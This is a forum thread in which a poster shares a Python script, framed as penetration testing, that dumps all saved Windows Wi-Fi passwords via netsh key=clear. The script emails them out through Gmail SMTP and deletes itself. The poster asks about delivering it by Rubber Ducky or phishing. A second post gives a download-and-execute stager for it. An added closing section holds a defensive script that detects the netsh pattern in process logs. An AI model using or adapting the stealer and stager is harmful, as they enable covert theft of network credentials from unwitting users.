thegrizzlyonedge Posted December 11, 2017

So I wanted to convince an enterprise of the importance of EAP-TLS for enterprise wireless access points that support sensitive systems. I'm sure many of you have come across companies that use username and password for their company's access points. I'm fairly new at writing Python scripts so please bear with me. Credit goes out to YouTube channel "pytutorials" for the wifi_passwords function.

# Tested on Windows 10 - with McAfee AntiVirus
# Runs a subprocess - netsh and identifies SSID names and Passwords
# Packages the findings and sends wireless SSIDs and Credentials to an email
# Requirements
## Sender Gmail Email Address
## Sender Gmail API Key
## Email address of the person receiving the SSID names and Credentials

How can we package this into a Rubber Ducky?

```python
#!/usr/bin/env python
import subprocess
import tempfile
import time
import smtplib
from email.mime.text import MIMEText
from os import remove
from sys import argv

print('Security Audit will take one minute')

# from_address = Senders email address
from_address = 'who_it_is_from_email_address_here'
# to_address = Receivers email address
to_address = 'receiver_email_address_here'
# api_key = Gmail API key
api_key = 'who_it_is_from_gmail_api_key_here'

#Create a temporary file to write SSID and wifi_passwords
fp = tempfile.TemporaryFile(mode='w+t')


def wifi_passwords():
    "This writes to tempfile SSID and Password"
    a = subprocess.check_output(['netsh', 'wlan', 'show', 'profiles']).decode('utf-8').split('\n')
    a = [i.split(":")[1][1:-1] for i in a if "All User Profile" in i]
    for i in a:
        results = subprocess.check_output(['netsh', 'wlan', 'show', 'profile', i, 'key=clear']).decode('utf-8').split('\n')
        results = [b.split(":")[1][1:-1] for b in results if "Key Content" in b]
        try:
            fp.write(str("{:<30}| {:<}\n".format(i, results[0])))
        except IndexError:
            fp.write(str("{:<30}| {:<}\n".format(i, "")))
        except KeyboardInterrupt:
            print("User stopped program!")
    fp.seek(0)


def send_message():
    "Sends an email with SSIDs and Creds"
    msg = MIMEText(fp.read())
    msg['From'] = from_address
    msg['To'] = to_address
    msg['Subject'] = 'SSIDs and Creds'
    server = smtplib.SMTP('smtp.gmail.com', 587)
    server.starttls()
    server.login(user=msg['From'], password=api_key)
    server.send_message(msg)
    server.quit()


wifi_passwords()
send_message()
fp.close()

# Below self destructs the python script when executed
remove(argv[0])
```
thegrizzlyonedge Posted December 11, 2017 (Author)

I want to be able to use the above code in a Penetration Testing Engagement, either via Phishing or Rubber Ducky. Here is what I did to test it.

```
# Create a local directory to act as the "malicious_server"
# In cmd.exe go to "malicious_server" directory
C:\> cd $filepath\malicious_server
# I'm using python3.6, stand up a http.server
C:\filepath\malicious_server>python -m http.server 8080
# Next, we can probably make this into a one-liner and apply it to a rubber ducky or phishing attack
```

```python
#!/usr/bin/env python
import urllib.request
import os
import subprocess

filename = os.path.expanduser(path='~\Downloads\wifipw.py')
urllib.request.urlretrieve('http://127.0.0.1:8080/wifipw.py', filename)
subprocess.call(filename, shell=True)
```

```
# An example of the outcome will be something like the following in an email:
ssid_name1 | password1
ssid_name2 | password2
ssid_name3 | password3
```

The script will automatically remove itself from the system.
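A defender-side counterpart to the posts above, added here as an example and not part of the original thread: the posted script runs `netsh wlan show profiles` and then `netsh wlan show profile <name> key=clear` once per saved profile, so process-creation logs that record command lines make the pattern visible. The event tuples, host names and the `classify`/`triage` helpers are constructed for illustration.

```python
import re

# "netsh wlan show profile(s)", with or without a path or .exe suffix.
WLAN_PROFILE = re.compile(r'(^|[\\/"\s])netsh(\.exe)?"?\s+wlan\s+show\s+profiles?\b', re.I)
# The key=clear argument that makes netsh print the stored key in plaintext.
KEY_CLEAR = re.compile(r'\bkey\s*=\s*"?clear\b', re.I)

# Constructed (host, parent image, command line) records, shaped like
# Sysmon Event ID 1 / Security 4688 data. Not real log data.
SAMPLE_EVENTS = [
    ("WS-001", "python.exe", "netsh wlan show profiles"),
    ("WS-001", "python.exe", 'netsh wlan show profile "Corp WiFi" key=clear'),
    ("WS-001", "python.exe", "netsh wlan show profile Guest key=clear"),
    ("WS-002", "cmd.exe", "C:\\Windows\\System32\\netsh.exe WLAN SHOW PROFILE name=Guest KEY=CLEAR"),
    ("WS-003", "explorer.exe", "netsh interface ip show config"),
    ("WS-004", "cmd.exe", "netsh wlan show interfaces"),
]

def classify(cmdline):
    """Return 'key_dump', 'profile_enum' or None for one command line."""
    if not WLAN_PROFILE.search(cmdline):
        return None
    return "key_dump" if KEY_CLEAR.search(cmdline) else "profile_enum"

def triage(events):
    """Group hits per host; only hosts with a key=clear call raise an alert."""
    hosts = {}
    for host, parent, cmdline in events:
        kind = classify(cmdline)
        if kind is None:
            continue
        h = hosts.setdefault(host, {"host": host, "enumerated": False,
                                    "key_dumps": 0, "parents": set()})
        h["parents"].add(parent.lower())
        if kind == "key_dump":
            h["key_dumps"] += 1
        else:
            h["enumerated"] = True
    alerts = []
    for h in hosts.values():
        if h["key_dumps"]:
            # Enumeration plus several dumps on one host matches a scripted sweep.
            bulk = h["enumerated"] and h["key_dumps"] >= 2
            alerts.append({**h, "parents": sorted(h["parents"]),
                           "severity": "high" if bulk else "medium"})
    return alerts

if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert)
```

A single `key=clear` call from an interactive shell lands at "medium" here, since that is also what an administrator troubleshooting one profile looks like; the parent image in each alert helps tell the two apart.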